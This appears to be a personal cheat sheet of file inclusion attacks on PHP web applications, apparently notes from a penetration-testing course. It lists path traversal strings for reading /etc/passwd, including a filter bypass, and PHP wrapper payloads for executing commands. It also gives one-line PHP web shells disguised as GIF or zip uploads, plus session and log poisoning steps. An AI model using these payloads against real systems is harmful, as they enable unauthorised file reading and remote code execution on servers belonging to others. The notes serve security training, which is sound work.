######################## LFI ######################################
http://<SERVER_IP>:<PORT>/index.php?language=
# ../../../../etc/passwd > basic 
# ....//....//....//....//etc/passwd > basic bypass. 
# this avoids: $language = str_replace('../', '', $_GET['language']);
# which is a Non-Recursive Path Traversal Filter

####################### Encoding ############################
# use URL encoding
# some filters filter out special characters like . or /
# here you can pass the decoded version of your string using burp suite


####################### Approved Paths ############################

# access file through the approved path (approved folder)
<SERVER_IP>:<PORT>/index.php?language=./languages/../../../../etc/passwd




https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion

######################## PHP WRAPPERS #########################

# PHP filter
php://filter/convert.base64-encode/resource=FILE

# PHP zip
zip:///filename_path#internal_filename

# PHP data
data://text/plain;base64,BASE64_STR
http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,BASE64_STR&cmd=<terminal_command>

# PHP expect
expect://command
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"


######################## RFI #########################
# check if it is RFI vulnerable, using the website itself
http://<SERVER_IP>:<PORT>/index.php?language=http://127.0.0.1:80/index.php

#  It may not be ideal to include the vulnerable page itself (i.e. index.php), as this may cause a recursive inclusion loop and cause a DoS to the back-end server


######################## File Upload #########################
# Create GIF file that runs shell
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

# Upload the file 

# Reload page & view source code to find the path of the uploaded file

# Run file via LFI
http://<SERVER_IP>:<PORT>/index.php?language=<path_to_file>&cmd=id

######################## Zip Upload #########################
# shell.jpg is the zip
# Note: Even though we named our zip archive as (shell.jpg), some upload forms may still detect our file as a zip archive through content-type tests and disallow its upload, so this attack has a higher chance of working if the upload of zip archives is allowed
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
http://<SERVER_IP>:<PORT>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id

######################## Phar Upload #########################
check: https://academy.hackthebox.com/module/23/section/1493

######################## Log poisoning #########################
################ PHP Session poisoning ##################
# language=url_encoded_php_cmd
# language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E

# copy cookie from Inspect -> Storage
# language=/var/lib/php/sessions/sess_<cookie>&cmd=id
######### To run another command ###########
# the session file has to be poisoned with the web shell again. That means you have 1 chance to execute a command
# this happens because the session file has been poisoned with the last command we used
# !! read again the Log poisoning module to grasp it more

################ Server log poisoning ##################
# Apache2 log location: /var/log/apache2/access.log
# Nginx log location:   /var/log/nginx/
